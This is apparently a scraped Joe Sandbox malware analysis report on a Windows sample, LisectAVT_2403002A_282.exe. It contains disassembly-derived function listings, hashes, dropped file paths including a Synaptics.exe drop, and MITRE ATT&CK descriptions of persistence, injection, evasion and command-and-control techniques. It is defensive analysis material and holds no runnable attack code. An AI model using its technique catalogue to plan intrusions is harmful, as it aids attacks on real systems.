Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: CloseCursorExecuteHandleMessageSendShell_memset
String ID: open
API String ID: 3461707343-2758837156
Opcode ID: 255527b49c1c3bf6a7bb7fc6ff664b582dbe81701b0034577f3b03ea56181b34
Instruction ID: c6a91d3e943759421ae365e58064c9f4b81d4ee6e0c46e390cc6b45669b61faa
Opcode Fuzzy Hash: 255527b49c1c3bf6a7bb7fc6ff664b582dbe81701b0034577f3b03ea56181b34
Instruction Fuzzy Hash: 3D114C71B00608AFDB11DFA9CD84DAFBBF8EBA5304B104929F511E2A10D770FA54DB62

Function 6C9C4F07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(0000007F,00000000,?,00000000,?,00000000,?,?,00000000,00000000,00000000,?,6C9C4FE2,00000000,00000000,00000200), ref: 6C9C4F4B
GetLastError.KERNEL32(?,6C9C4FE2,00000000,00000000,00000200,?,6C9C5110,00000000,00000000,00000000,?,?,00000000,?,6C9C5173,00000000), ref: 6C9C4F55

Strings

strutil.cpp, xrefs: 6C9C4F7A

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: ErrorLastString
String ID: strutil.cpp
API String ID: 3728238275-3612885251
Opcode ID: ba4e76fc054c390abeab99d9d77626c2e64d8247fdb60adcf7ab142e191b21b1
Instruction ID: f6ef157f15e4adf4e8eff5f42e528c0c88252e424eee3a7b156b8e9ef6c0dc1f
Opcode Fuzzy Hash: ba4e76fc054c390abeab99d9d77626c2e64d8247fdb60adcf7ab142e191b21b1
Instruction Fuzzy Hash: 97018437304906BBDB120E918C04FAA3F69DFD17B0F154124FD68AA650EB35C5209F53

Function 6C9C9AB1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 6C9C9AF6
SysFreeString.OLEAUT32(00000000), ref: 6C9C9B2B

Strings

xmlutil.cpp, xrefs: 6C9C9AC7, 6C9C9B0D

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: String$AllocFree
String ID: xmlutil.cpp
API String ID: 344208780-1270936966
Opcode ID: 94d654f7d2058c237df2aa923fed356eb02c829d3f122bb2a46e5b333e7d4b4e
Instruction ID: 55a1ad0e839903b9ec7fefd8a485eee4ef137278522b6e33d9fe119299641783
Opcode Fuzzy Hash: 94d654f7d2058c237df2aa923fed356eb02c829d3f122bb2a46e5b333e7d4b4e
Instruction Fuzzy Hash: CB012B31744645BBDB005B698C48E6B37ADDF9636CF164422FC04EBB00DB74D8408353

Function 6C9C9BA8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 6C9C9BED
SysFreeString.OLEAUT32(00000000), ref: 6C9C9C22

Strings

xmlutil.cpp, xrefs: 6C9C9BBE, 6C9C9C04

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: String$AllocFree
String ID: xmlutil.cpp
API String ID: 344208780-1270936966
Opcode ID: 328cfd417dd6cfa2621d5adb88b46768c1cfdc2663e744e12ae5e10400a56a54
Instruction ID: b94eb3df4a728cb2a90eaab999acacdb886dd65c979ea3a6b51cbfb02bb4a2d0
Opcode Fuzzy Hash: 328cfd417dd6cfa2621d5adb88b46768c1cfdc2663e744e12ae5e10400a56a54
Instruction Fuzzy Hash: D701A271788606BBE7101B6A8C44EAB36BDDF917ACF164935F904EBB40D675D84082A3

Function 6C9CA2BD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000000,00000104,00000000,00000000,00000000,?,6C9CA425,00000000,?,?,?,6C9CB0B9,00000000), ref: 6C9CA2DE
GetLastError.KERNEL32(?,6C9CA425,00000000,?,?,?,6C9CB0B9,00000000,00000000,?,?,?,6C9C2A8B,?,00000000,00000000), ref: 6C9CA2F5

Strings

pathutil.cpp, xrefs: 6C9CA31A

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: pathutil.cpp
API String ID: 2776309574-741606033
Opcode ID: c702cf70d269e84d2bb90b1b39a2dfe7d655e71909f1a25045a504297847ab59
Instruction ID: 96797cfe778589bd3b2a3d45c07a6fc896f0a7bd702df6ee59a964564b1e4736
Opcode Fuzzy Hash: c702cf70d269e84d2bb90b1b39a2dfe7d655e71909f1a25045a504297847ab59
Instruction Fuzzy Hash: 64F046B27055366BE31116858C94A5BBA6CDF127B8B110231FD00FBE00DB19DC4047E3

Function 6C9CA7AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetFileSizeEx.KERNEL32(?,?,00000000,00000000,?,?,?,6C9C7762,00000000,00000024,?,00000000,?,?,6C9DC028,00000024), ref: 6C9CA7C7
GetLastError.KERNEL32(?,?,?,6C9C7762,00000000,00000024,?,00000000,?,?,6C9DC028,00000024), ref: 6C9CA7D1

Strings

fileutil.cpp, xrefs: 6C9CA7F6

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: ErrorFileLastSize
String ID: fileutil.cpp
API String ID: 464720113-2967768451
Opcode ID: 79c885f6fd7627da3437c0b10dd626dfadefb8d07d68f6054855fe7acbabc5f0
Instruction ID: c1aa752d654f09e75d4ff1fabbf5827e2ad2a1323bbc281485df5f7a7de78781
Opcode Fuzzy Hash: 79c885f6fd7627da3437c0b10dd626dfadefb8d07d68f6054855fe7acbabc5f0
Instruction Fuzzy Hash: 95F0CDB6700605BFD7008F99C804AAA7BF8EF85B20B104028E885E7600EA30EA418B62

Function 6C9C99C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 6C9C99D9
SysFreeString.OLEAUT32(00000000), ref: 6C9C9A0B

Strings

xmlutil.cpp, xrefs: 6C9C99ED

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: String$AllocFree
String ID: xmlutil.cpp
API String ID: 344208780-1270936966
Opcode ID: 7b6a04380ae61d82e36fdc2ca385762dc7989a491ac58caef4bf6fd12958d934
Instruction ID: 7481a534f934257c1d8a4fbbdb56e40731ad5a6010ae843f36e13577c86b2a75
Opcode Fuzzy Hash: 7b6a04380ae61d82e36fdc2ca385762dc7989a491ac58caef4bf6fd12958d934
Instruction Fuzzy Hash: D5F02431740A54E7CB115F598C48F5A73B9DF8276CF224124FC14BB610C331D950C792

Function 6C9C9B4C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 6C9C9B61
SysFreeString.OLEAUT32(00000000), ref: 6C9C9B93

Strings

xmlutil.cpp, xrefs: 6C9C9B78

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: String$AllocFree
String ID: xmlutil.cpp
API String ID: 344208780-1270936966
Opcode ID: 661bf289c51e83a971379d57848bcf455c4f2265342d3b497f9d28e339b7f5d6
Instruction ID: fecac2ec9e513ed41ccc80e064070dc9afde545619fdac6fc8c546635913cbc6
Opcode Fuzzy Hash: 661bf289c51e83a971379d57848bcf455c4f2265342d3b497f9d28e339b7f5d6
Instruction Fuzzy Hash: F6F0BE32764759B7CB110F598C08E6A77BCEFA2768B224115FC18AB610C776D94087D2

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report LisectAVT_2403002A_282.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Synaptics\RCX822C.tmp

C:\ProgramData\Synaptics\Synaptics.exe

C:\ProgramData\Synaptics\Synaptics.exe:Zone.Identifier

C:\Users\user\AppData\Local\Temp\4bzU9tWE.xlsm

C:\Users\user\AppData\Local\Temp\CRhqW9p.ini

C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20240725160456.log

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1028\license.rtf

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1028\thm.wxl

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1029\license.rtf

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1029\thm.wxl

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1031\license.rtf

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1031\thm.wxl

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1036\license.rtf

Windows Analysis Report
LisectAVT_2403002A_282.exe

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre